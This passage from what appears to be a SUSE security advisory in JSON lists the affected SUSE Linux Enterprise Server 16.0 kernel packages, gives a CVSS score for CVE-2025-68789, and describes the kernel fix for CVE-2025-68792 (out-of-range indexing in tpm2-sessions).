"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:51:02Z",
"details": "moderate"
}
],
"title": "CVE-2025-68789"
},
{
"cve": "CVE-2025-68792",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68792"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ntpm2-sessions: Fix out of range indexing in name_size\n\n\u0027name_size\u0027 does not have any range checks, and it just directly indexes\nwith TPM_ALG_ID, which could lead into memory corruption at worst.\n\nAddress the issue by only processing known values and returning -EINVAL for\nunrecognized values.\n\nMake also \u0027tpm_buf_append_name\u0027 and \u0027tpm_buf_fill_hmac_session\u0027 fallible so\nthat errors are detected before causing any spurious TPM traffic.\n\nEnd also the authorization session on failure in both of the functions, as\nthe session state would be then by definition corrupted.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-livepatch-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise Server for SAP applications 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
